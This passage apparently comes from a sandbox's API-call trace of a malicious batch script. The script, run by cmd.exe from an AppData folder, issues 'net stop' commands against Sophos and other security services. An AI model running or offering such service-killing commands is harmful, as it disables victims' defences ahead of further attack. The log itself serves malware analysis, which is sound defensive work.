lpFilePart=0x3be93c*="Desktop") returned 0x25 [0038.369] SetErrorMode (uMode=0x0) returned 0x1 [0038.369] GetProcessHeap () returned 0x3e0000 [0038.369] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0038.369] GetProcessHeap () returned 0x3e0000 [0038.369] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0038.369] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0038.369] GetProcessHeap () returned 0x3e0000 [0038.369] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0038.369] GetProcessHeap () returned 0x3e0000 [0038.369] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0038.369] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0038.369] GetProcessHeap () returned 0x3e0000 [0038.369] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0038.369] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0038.369] GetProcessHeap () returned 0x3e0000 [0038.369] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0038.369] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0038.369] GetProcessHeap () returned 0x3e0000 [0038.370] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0038.370] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0038.370] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0038.370] GetLastError () returned 0x2 [0038.370] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0038.370] GetLastError () returned 0x2 [0038.370] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0038.370] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0038.370] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0038.370] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0038.370] GetLastError () returned 0x2 [0038.370] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0038.370] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0038.370] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0038.371] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0038.371] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0038.371] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0038.371] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0038.371] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop ΓÇ£Sophos System Protection ServiceΓÇ¥ /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop ΓÇ£Sophos System Protection ServiceΓÇ¥ /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop ΓÇ£Sophos System Protection ServiceΓÇ¥ /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0xba4, dwThreadId=0xba8)) returned 1 [0038.375] CloseHandle (hObject=0x78) returned 1 [0038.375] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0038.375] GetProcessHeap () returned 0x3e0000 [0038.375] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0038.375] GetEnvironmentStringsW () returned 0x3f8408* [0038.375] GetProcessHeap () returned 0x3e0000 [0038.375] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0038.375] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0038.375] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0038.530] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x1) returned 1 [0038.530] CloseHandle (hObject=0x74) returned 1 [0038.530] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000001") returned 8 [0038.530] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0038.530] GetProcessHeap () returned 0x3e0000 [0038.530] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0038.530] GetEnvironmentStringsW () returned 0x3f8408* [0038.530] GetProcessHeap () returned 0x3e0000 [0038.530] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0038.530] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0038.530] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0038.530] GetProcessHeap () returned 0x3e0000 [0038.530] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0038.530] GetEnvironmentStringsW () returned 0x3f8408* [0038.530] GetProcessHeap () returned 0x3e0000 [0038.530] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0038.530] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0038.530] GetProcessHeap () returned 0x3e0000 [0038.530] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0038.530] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0038.530] _get_osfhandle (_FileHandle=1) returned 0x264 [0038.531] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0038.531] _get_osfhandle (_FileHandle=1) returned 0x264 [0038.531] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0038.531] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0038.531] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0038.531] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0038.531] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0038.532] SetConsoleInputExeNameW () returned 0x1 [0038.532] GetConsoleOutputCP () returned 0x1b5 [0038.532] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0038.532] SetThreadUILanguage (LangId=0x0) returned 0x409 [0038.532] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0038.532] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0038.532] _get_osfhandle (_FileHandle=3) returned 0x74 [0038.532] SetFilePointer (in: hFile=0x74, lDistanceToMove=1198, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4ae [0038.532] GetProcessHeap () returned 0x3e0000 [0038.532] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0038.532] GetProcessHeap () returned 0x3e0000 [0038.532] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0038.532] GetProcessHeap () returned 0x3e0000 [0038.532] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0038.532] GetProcessHeap () returned 0x3e0000 [0038.532] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0038.532] GetProcessHeap () returned 0x3e0000 [0038.532] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0038.532] GetProcessHeap () returned 0x3e0000 [0038.532] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0038.532] GetProcessHeap () returned 0x3e0000 [0038.532] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0038.532] GetProcessHeap () returned 0x3e0000 [0038.532] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0038.533] GetProcessHeap () returned 0x3e0000 [0038.533] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0038.533] GetProcessHeap () returned 0x3e0000 [0038.533] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0038.533] GetProcessHeap () returned 0x3e0000 [0038.533] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fbaf0 | out: hHeap=0x3e0000) returned 1 [0038.533] GetProcessHeap () returned 0x3e0000 [0038.533] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0038.533] GetProcessHeap () returned 0x3e0000 [0038.533] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0038.533] _get_osfhandle (_FileHandle=3) returned 0x74 [0038.533] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4ae [0038.533] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x1413, lpOverlapped=0x0) returned 1 [0038.533] SetFilePointer (in: hFile=0x74, lDistanceToMove=1226, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4ca [0038.533] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=28, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop EraserSvc11710 /y\r\notection ServiceΓÇ¥ /y\r\nlures\r\nnded\r\n") returned 28 [0038.533] _get_osfhandle (_FileHandle=3) returned 0x74 [0038.533] GetFileType (hFile=0x74) returned 0x1 [0038.533] _get_osfhandle (_FileHandle=3) returned 0x74 [0038.533] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4ca [0038.533] GetProcessHeap () returned 0x3e0000 [0038.533] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fcad8 [0038.533] GetProcessHeap () returned 0x3e0000 [0038.533] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fcad8 | out: hHeap=0x3e0000) returned 1 [0038.534] _tell (_FileHandle=3) returned 1226 [0038.534] _close (_FileHandle=3) returned 0 [0038.534] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0038.534] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0038.534] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0038.534] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0038.534] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0038.534] _wcsicmp (_String1="net", _String2="CD") returned 11 [0038.534] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0038.534] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0038.534] _wcsicmp (_String1="net", _String2="REN") returned -4 [0038.534] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0038.534] _wcsicmp (_String1="net", _String2="SET") returned -5 [0038.534] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0038.534] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0038.534] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0038.534] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0038.534] _wcsicmp (_String1="net", _String2="MD") returned 1 [0038.534] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0038.534] _wcsicmp (_String1="net", _String2="RD") returned -4 [0038.534] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0038.534] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0038.534] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0038.534] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0038.535] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0038.535] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0038.535] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0038.535] _wcsicmp (_String1="net", _String2="VER") returned -8 [0038.535] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0038.535] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0038.535] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0038.535] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0038.535] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0038.535] _wcsicmp (_String1="net", _String2="START") returned -5 [0038.535] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0038.535] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0038.535] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0038.535] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0038.535] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0038.535] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0038.535] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0038.535] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0038.535] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0038.535] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0038.535] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0038.535] SetErrorMode (uMode=0x0) returned 0x1 [0038.535] GetProcessHeap () returned 0x3e0000 [0038.535] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0038.535] GetProcessHeap () returned 0x3e0000 [0038.535] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0038.535] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0038.535] GetProcessHeap () returned 0x3e0000 [0038.535] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0038.535] GetProcessHeap () returned 0x3e0000 [0038.535] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0038.535] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0038.536] GetProcessHeap () returned 0x3e0000 [0038.536] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0038.536] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0038.536] GetProcessHeap () returned 0x3e0000 [0038.536] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0038.536] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0038.536] GetProcessHeap () returned 0x3e0000 [0038.536] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0038.536] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0038.536] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0038.536] GetLastError () returned 0x2 [0038.536] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0038.536] GetLastError () returned 0x2 [0038.536] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0038.536] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0038.536] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0038.536] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0038.537] GetLastError () returned 0x2 [0038.537] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0038.537] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0038.537] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0038.537] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0038.537] SetErrorMode (uMode=0x0) returned 0x1 [0038.537] GetProcessHeap () returned 0x3e0000 [0038.537] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0038.537] GetProcessHeap () returned 0x3e0000 [0038.537] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0038.537] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0038.537] GetProcessHeap () returned 0x3e0000 [0038.537] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0038.537] GetProcessHeap () returned 0x3e0000 [0038.537] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0038.537] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0038.537] GetProcessHeap () returned 0x3e0000 [0038.537] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0038.537] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0038.537] GetProcessHeap () returned 0x3e0000 [0038.537] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0038.537] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0038.537] GetProcessHeap () returned 0x3e0000 [0038.537] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0038.537] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0038.538] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0038.538] GetLastError () returned 0x2 [0038.538] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0038.538] GetLastError () returned 0x2 [0038.538] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0038.538] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0038.538] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0038.538] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0038.538] GetLastError () returned 0x2 [0038.538] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0038.538] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0038.538] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0038.538] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0038.539] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0038.539] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0038.539] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0038.539] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop EraserSvc11710 /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop EraserSvc11710 /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop EraserSvc11710 /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0xbb4, dwThreadId=0xbb8)) returned 1 [0038.542] CloseHandle (hObject=0x74) returned 1 [0038.542] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0038.542] GetProcessHeap () returned 0x3e0000 [0038.542] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0038.542] GetEnvironmentStringsW () returned 0x3f8408* [0038.543] GetProcessHeap () returned 0x3e0000 [0038.543] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0038.543] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0038.543] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0038.754] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0038.754] CloseHandle (hObject=0x78) returned 1 [0038.754] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0038.754] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0038.754] GetProcessHeap () returned 0x3e0000 [0038.754] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0038.754] GetEnvironmentStringsW () returned 0x3f8408* [0038.754] GetProcessHeap () returned 0x3e0000 [0038.754] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0038.754] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0038.754] SetEnvironmentVariableW 